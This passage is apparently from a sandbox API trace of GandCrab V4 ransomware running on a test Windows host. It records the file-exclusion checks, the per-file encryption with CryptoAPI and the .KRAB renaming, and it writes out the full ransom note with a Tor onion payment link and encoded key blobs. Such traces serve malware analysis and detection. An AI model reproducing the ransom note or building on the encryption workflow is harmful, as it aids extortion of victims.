lpString2="ntuser.dat") returned -1 [0076.620] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="iconcache.db") returned 1 [0076.620] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="bootsect.bak") returned 1 [0076.620] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="boot.ini") returned 1 [0076.620] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="ntuser.dat.log") returned -1 [0076.620] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="thumbs.db") returned -1 [0076.620] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="KRAB-DECRYPT.html") returned -1 [0076.620] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="KRAB-DECRYPT.txt") returned -1 [0076.620] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="CRAB-DECRYPT.txt") returned 1 [0076.620] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="ntldr") returned -1 [0076.620] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="NTDETECT.COM") returned -1 [0076.620] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="Bootfont.bin") returned 1 [0076.620] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.620] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0x1011700) returned 1 [0076.624] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0076.624] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0076.624] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0076.625] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0076.625] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0076.625] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.625] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0x1011700) returned 1 [0076.628] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0076.629] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0076.629] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0076.629] CryptGenRandom (in: hProv=0x1011700, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0076.629] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0076.629] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.630] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0x1010bd8) returned 1 [0076.633] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0x1023278) returned 1 [0076.633] CryptGetKeyParam (in: hKey=0x1023278, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0076.633] CryptEncrypt (in: hKey=0x1023278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0076.634] GetLastError () returned 0x0 [0076.634] CryptDestroyKey (hKey=0x1023278) returned 1 [0076.634] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0076.634] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0x10109b8) returned 1 [0076.637] CryptImportKey (in: hProv=0x10109b8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0x10237b8) returned 1 [0076.637] CryptGetKeyParam (in: hKey=0x10237b8, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0076.638] CryptEncrypt (in: hKey=0x10237b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0076.638] GetLastError () returned 0x0 [0076.638] CryptDestroyKey (hKey=0x10237b8) returned 1 [0076.638] CryptReleaseContext (hProv=0x10109b8, dwFlags=0x0) returned 1 [0076.638] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20170518000419"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x780 [0076.639] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0076.639] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0076.640] ReadFile (in: hFile=0x780, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e7fc*=0xa, lpOverlapped=0x0) returned 1 [0076.660] SetFilePointerEx (in: hFile=0x780, liDistanceToMove=0xfffffff6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.660] WriteFile (in: hFile=0x780, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e7f8*=0xa, lpOverlapped=0x0) returned 1 [0076.660] WriteFile (in: hFile=0x780, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0076.661] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.961] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.962] CloseHandle (hObject=0x780) returned 1 [0076.970] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.970] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20170518000419"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20170518000419.krab")) returned 1 [0076.971] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.971] FindNextFileW (in: hFindFile=0x1023538, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0076.971] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0076.971] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0076.971] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\KRAB-DECRYPT.txt" [0076.971] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.972] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\KRAB-DECRYPT.txt.KRAB") returned 89 [0076.972] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\KRAB-DECRYPT.txt") returned 84 [0076.972] lstrlenW (lpString=".txt") returned 4 [0076.972] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.972] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0076.972] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.973] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\KRAB-DECRYPT.txt") returned 84 [0076.973] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\KRAB-DECRYPT.txt") returned 84 [0076.973] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0076.973] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0076.973] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0076.973] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0076.973] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0076.973] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0076.973] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0076.973] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0076.973] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0076.973] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0076.973] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.973] FindNextFileW (in: hFindFile=0x1023538, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0076.974] FindClose (in: hFindFile=0x1023538 | out: hFindFile=0x1023538) returned 1 [0076.974] CloseHandle (hObject=0x774) returned 1 [0076.974] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.974] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0076.974] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0076.974] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\d2ca4a08d2ca4dee3d.lock" [0076.974] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.975] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 82 [0076.975] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\d2ca4a08d2ca4dee3d.lock") returned 77 [0076.975] lstrlenW (lpString=".lock") returned 5 [0076.975] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.975] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0076.975] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.975] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.976] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.976] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0076.976] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0076.976] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\KRAB-DECRYPT.txt" [0076.976] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.976] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\KRAB-DECRYPT.txt.KRAB") returned 75 [0076.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\KRAB-DECRYPT.txt") returned 70 [0076.976] lstrlenW (lpString=".txt") returned 4 [0076.976] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.977] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0076.977] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\KRAB-DECRYPT.txt") returned 70 [0076.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\KRAB-DECRYPT.txt") returned 70 [0076.977] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0076.977] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0076.977] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0076.977] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0076.977] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0076.977] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0076.977] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0076.977] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0076.977] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0076.977] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0076.977] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.978] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.978] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0076.978] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0076.978] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Profiles" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0076.978] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0076.978] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0076.978] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0076.978] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0076.978] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0076.978] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0076.978] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.979] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.979] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\KRAB-DECRYPT.txt") returned 80 [0076.979] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x774 [0076.980] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0076.980] WriteFile (in: hFile=0x774, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0076.981] CloseHandle (hObject=0x774) returned 1 [0076.981] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.981] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.982] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x18, wMilliseconds=0xbc)) [0076.982] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.982] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0076.982] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0076.982] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\d2ca4a08d2ca4dee3d.lock") returned 86 [0076.982] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x43c [0077.001] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.001] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.001] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 63 [0077.001] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*" [0077.002] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0x1023138 [0077.002] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.002] FindNextFileW (in: hFindFile=0x1023138, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0077.002] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.002] lstrcmpW (lpString1="..", 